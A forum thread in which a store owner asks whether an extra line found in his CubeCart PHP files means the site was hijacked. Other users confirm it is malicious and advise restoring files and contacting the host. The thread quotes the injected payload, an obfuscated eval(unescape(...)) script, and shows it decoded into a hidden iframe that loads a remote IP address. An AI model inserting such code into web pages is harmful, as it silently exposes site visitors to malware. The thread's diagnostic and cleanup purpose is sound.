Hijacking?

[djf]

Can anyone help me please, I know virtually nothing about php.

Recently I have been under attack from an unscrupulous competitor and started to wonder if my files have been altered.

I checked and in fact 3 files have been altered recently that I would never touch as I have no clue what I would need to change in them. They are index.php in the root folder and /Admin/index.php and login.php. I downloaded them and compared them to the originals and there is an extra line at the end of them. I don't know if these files get altered in the normal course of events or not.

This is the line that is different, it's the very last one and this script line has been added:

<?php include("includes/footer.inc.php"); ?><script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%37%39%64%38%33%36%62%30%30%32%35%66%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%31%31%36%2e%35%30%2e%31%35%2e%32%35%2f%73%74%61%74%73%2f%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%34%32%32%31%37%29%2b%27%32%37%5c%27%20%77%69%64%74%68%3d%31%36%33%20%68%65%69%67%68%74%3d%32%35%39%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>

Perhaps I'm being paranoid but if anyone could let me know if this is a hijacking or not I would appreciate it.

Thanks in advance.

David

[Robsta]

I would say you had. There is no includes/footer.inc.php.

[djf]

Thanks Robsta

It's that <script> then those weird numbers that worried me.

Do you think it will be O.K. to just remove the last line?

David

[Robsta]

Yes the script bit is worrying. Have you applied any mods? if not, upload all the core PHP files overwriting, with the exception of the includes/global.inc.php file. Take a backup first and make sure the files are from the same version of CubeCart.

Speak to your hosting company, if your site has been affected, it's likely the culpret has got into the server another route. The hosting company needs to know.

[Homar]

That code inserts the following JavaScript into your site:

window.status='Done';

document.write('<iframe name=79d836b0025f src=\'http://116.50.15.25/stats/?'+Math.round(Math.random()*42217)+'27\' width=163 height=259 style=\'display: none\'></iframe>');

Do you have an old version of Wordpress on your hosting account? Through a Google search, this hack is common amongst older versions of wordpress. Regardless, this is malicious code and you will need to get your hosting provider to look into this. It's very likely that malicious code has been inserted into multiple files (inc. server configuration files).

My suggestion would be to shut down your store while this is being fixed. If Google crawls your site and determines that your site is infected with this code, your domain may be marked as "malware".